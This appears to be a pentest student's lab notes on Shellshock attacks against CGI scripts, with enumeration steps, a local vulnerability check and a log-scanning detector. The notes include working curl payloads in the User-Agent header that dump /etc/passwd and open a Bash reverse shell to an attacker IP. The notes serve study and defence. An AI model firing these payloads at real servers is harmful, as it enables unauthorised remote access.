
Attacking CGI Apps: Shellshock

  • Common Gateway Interface (CGI) is used to help a web server render dynamic pages and create a customized response for the user making a request via a web application.
  • CGI applications are primarily used to access other applications running on a web server. CGI is essentially middleware between web servers, external databases, and information sources. CGI scripts and programs are kept in the /cgi-bin directory on a web server and can be written in C, C++, Java, Perl, etc. CGI scripts run in the security context of the web server.
  • CGI scripts/applications are typically used for a few reasons:
    • If the web server must dynamically interact with the user
    • When a user submits data to the web server by filling out a form. The CGI application processes the data and returns the result to the user via the web server
      • A graphical depiction of how CGI works (diagram not reproduced here): 1. Browser sends URL to server. 2. Server uses CGI to run program. 3. Program runs. 4. Program sends output to server. 5. Server returns output to browser.
  • Broadly, the steps are as follows:
    • A directory is created on the web server containing the CGI scripts/applications. This directory is typically called cgi-bin.
    • The web application user sends a request to the server via a URL, e.g., https://acme.com/cgi-bin/newchiscript.pl
    • The server runs the script and passes the resulting output back to the web client
  • Every CGI program starts a new process for each HTTP request, which consumes a lot of server memory, and a new database connection is opened every time

CGI Attacks

  • Shellshock (Bash Bug) via CGI - https://nvd.nist.gov/vuln/detail/CVE-2014-6271
    • A security flaw in the Bash shell (GNU Bash up to version 4.3) that can be used to execute unintended commands via specially crafted environment variables.

Shellshock via CGI

  • The Shellshock vulnerability allows an attacker to exploit old versions of Bash that handle environment variables incorrectly.
  • env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"
    • Run this to check whether the local Bash is vulnerable; an unpatched shell prints vulnerable-shellshock before not vulnerable

Enum & Attack

  • gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi
    • extension -x cgi because the scripts are stored as script.cgi
  • we find a file access.cgi
  • requesting it directly, we see a 200 OK
  • checking if it is vulnerable:
    • curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.129.204.231/cgi-bin/access.cgi
    • send our payload in the user agent
    • can be done using Burp
  • curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi
    • getting a reverse shell
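The payloads above travel in HTTP headers that the web server exports to the CGI script as environment variables (HTTP_USER_AGENT, HTTP_REFERER), so they also end up in the access log. The following is an added detection example, not code from the original notes, that scans Apache/nginx combined-format log lines for the Shellshock function-definition marker and pulls out the trailing command; the log lines and IP addresses are constructed for the example.

```python
import re
from typing import Dict, List

# Apache/nginx "combined" log format: client, identity, user, timestamp,
# request line, status, size, Referer, User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock marker: a Bash function definition "() {" inside a header value,
# optionally followed by the trailing command that a vulnerable Bash would run.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<cmd>.*)')


def find_shellshock_attempts(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per log line whose User-Agent or Referer carries a
    Shellshock-style function definition (both are passed to CGI as env vars)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # blank line or not in combined format
        for field in ("ua", "referer"):
            hit = SHELLSHOCK_RE.search(m.group(field))
            if hit:
                findings.append({
                    "ip": m.group("ip"),
                    "path": m.group("path"),
                    "status": m.group("status"),
                    "field": field,
                    "command": hit.group("cmd").strip(),
                    # requests under /cgi-bin/ are the ones that reach a CGI script
                    "cgi_target": m.group("path").startswith("/cgi-bin/"),
                })
    return findings


# Constructed sample lines (not from a real server); the second line carries
# the User-Agent payload shown in the notes above.
SAMPLE_LOG = """\
10.10.14.38 - - [10/Oct/2023:12:00:01 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.38 - - [10/Oct/2023:12:00:05 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 200 1408 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
10.10.14.38 - - [10/Oct/2023:12:00:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "(){ :;}; id" "curl/7.88.1"
"""

if __name__ == "__main__":
    for f in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} via {f['field']}: {f['command']}")
```

A 200 response to a /cgi-bin/ request carrying this marker is the strongest signal; hits against non-CGI paths still show that the host is being probed.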

Mitigation

  • https://www.digitalocean.com/community/tutorials/how-to-protect-your-server-against-the-shellshock-bash-vulnerability